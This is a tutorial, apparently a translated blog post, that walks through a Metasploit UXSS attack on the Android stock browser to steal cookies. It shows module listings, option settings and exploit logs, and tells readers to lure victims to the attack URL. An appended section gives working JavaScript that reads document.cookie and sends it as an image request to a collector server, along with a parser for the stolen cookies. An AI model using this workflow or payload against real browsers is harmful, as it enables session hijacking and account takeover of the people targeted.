An attacker's workflow is to gather information first, locate a vulnerability, and then pick the technique that fits that particular vulnerability to break in. Below I use Metasploit to walk through a cross-site scripting attack of this kind, with my own phone as the target.

1. Gather information
msf > search android

Matching Modules
================

   Name                                                        Disclosure Date  Rank       Description
   ----                                                        ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                    normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/gather/android_browser_new_tab_cookie_theft                        normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                    normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss            2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                  normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/scanner/sip/sipdroid_ext_enum                                      normal     SIPDroid Extension Grabber
   exploit/android/browser/samsung_knox_smdm_url               2014-11-12       normal     Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/webview_addjavascriptinterface      2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface    2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                         2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/multi/handler                                                        manual     Generic Payload Handler
   payload/android/meterpreter/reverse_http                                     normal     Android Meterpreter, Dalvik Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                    normal     Android Meterpreter, Dalvik Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                      normal     Android Meterpreter, Dalvik Reverse TCP Stager
   payload/android/shell/reverse_http                                           normal     Command Shell, Dalvik Reverse HTTP Stager
   payload/android/shell/reverse_https                                          normal     Command Shell, Dalvik Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                            normal     Command Shell, Dalvik Reverse TCP Stager
As the list shows, there is no shortage of exploitable Android vulnerabilities. Here I picked a UXSS (universal cross-site scripting) bug: unlike an ordinary XSS, which is a flaw in one web site, a UXSS is a flaw in the browser itself, so a single malicious page can run script in the context of any other origin and bypass the same-origin policy. Searching for the module shows its description.

In short: if the attack succeeds, the attacker obtains, from your browser, the cookies of the target pages. Only cookies that are visible to script are affected; a cookie set with the HttpOnly flag cannot be read through document.cookie and so is not exposed this way.

2. Next, load the module and look at its options.
msf > use auxiliary/gather/android_object_tag_webview_uxss
msf auxiliary(android_object_tag_webview_uxss) > show options

Module options (auxiliary/gather/android_object_tag_webview_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   REMOTE_JS                        no        A URL to inject into a script tag in the context of the target URLs.
   SRVHOST      0.0.0.0             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH                          no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer
From the output above, the required fields are SRVHOST, SRVPORT and TARGET_URLS, and this is the key step. The module's own web server (SRVHOST/SRVPORT) hosts the attack page; TARGET_URLS is the comma-separated list of sites whose cookies you want to grab; and if you want your own script to run inside those sites, you put it in CUSTOM_JS or host it somewhere and point REMOTE_JS at it. So what you need to do here is get your script ready and embed the code that collects the cookies and sends them back!

Here I left everything other than SRVHOST at its default, purely for demonstration. (Later I will give a concrete example of how other people build their XSS.)
msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106
SRVHOST => 192.168.1.106

3. Assuming your script and site are ready, type "exploit". Once the server is up, you are most of the way there.
msf auxiliary(android_object_tag_webview_uxss) > exploit
[*] Auxiliary module execution completed
msf auxiliary(android_object_tag_webview_uxss) >
[*] Using URL: http://192.168.1.106:8080/ORvS7Li6X
[*] Server started.

4. Next, find a way to get that URL in front of victims, then sit back and wait for the results.
[*] 192.168.1.105 android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105 android_object_tag_webview_uxss - Sending initial HTML ...
[*] 192.168.1.105 android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105 android_object_tag_webview_uxss - Sending initial HTML ...
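The post does not show the script that steps 2 and 3 refer to. The following is an added example, not code from the original post and not part of the Metasploit module: it builds the kind of string one would pass to CUSTOM_JS (which, per the option table, runs in the context of each TARGET_URLS origin) and shows how the receiving side turns the resulting request back into cookies. The collector URL, its /collect path and the o and c parameter names are assumptions for the demo; the module does its own cookie collection and does not use them. The sample cookie string is constructed.

```javascript
// Added example (not from the original post or from Metasploit): a cookie
// exfiltration payload of the kind CUSTOM_JS would carry, plus the parser
// for what arrives at the listener. COLLECTOR and the parameter names
// "o" (origin) and "c" (cookies) are assumptions made for this demo.
const COLLECTOR = "http://192.168.1.106:8080/collect"; // assumed endpoint

// Returns the JavaScript string you would paste into `set CUSTOM_JS ...`.
// It runs inside the victim origin: read document.cookie, percent-encode it
// (cookie values may contain '=', ';' or non-ASCII) and ship it out as an
// image request, which needs no CORS handling and works in old WebKit
// browsers such as the AOSP stock browser. location.protocol + location.host
// is used instead of location.origin for the same compatibility reason.
function customJsPayload(collector) {
  return "(function(){var i=new Image();i.src=" +
    JSON.stringify(collector) +
    "+'?o='+encodeURIComponent(location.protocol+'//'+location.host)" +
    "+'&c='+encodeURIComponent(document.cookie);})();";
}

// The same URL construction as the payload, but callable from Node so the
// round trip can be exercised without a browser.
function beaconUrl(collector, origin, cookieString) {
  return collector + "?o=" + encodeURIComponent(origin) +
    "&c=" + encodeURIComponent(cookieString);
}

// Listener side: decode one beacon request into { origin, cookies }.
// Only the first '=' separates name from value, since values may contain '='.
function parseBeacon(requestUrl) {
  const u = new URL(requestUrl);
  const origin = u.searchParams.get("o") || "";
  const raw = u.searchParams.get("c") || "";
  const cookies = {};
  for (const part of raw.split(";")) {
    const p = part.trim();
    if (!p) continue;
    const eq = p.indexOf("=");
    if (eq < 0) {
      cookies[p] = "";          // flag-style cookie without a value
    } else {
      cookies[p.slice(0, eq)] = p.slice(eq + 1);
    }
  }
  return { origin, cookies };
}

// Constructed sample of what a logged-in victim would send. HttpOnly cookies
// never show up here because document.cookie does not expose them; that is
// the main limit of cookie theft through script injection.
const sampleCookies = "session=abc123; theme=dark; token=a=b";
const sampleRequest = beaconUrl(COLLECTOR, "http://example.com", sampleCookies);

console.log(customJsPayload(COLLECTOR));
console.log(parseBeacon(sampleRequest));
```

The payload string is deliberately a single self-invoking expression with no line breaks, so it survives being passed as one msfconsole option value. On the receiving side, anything that reaches the collector is attacker-controlled input: decode it with a real URL parser as above rather than by string splitting on the raw request line.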
Afterword: this post does not go into how to design and build the script itself; for that, this article is a good reference.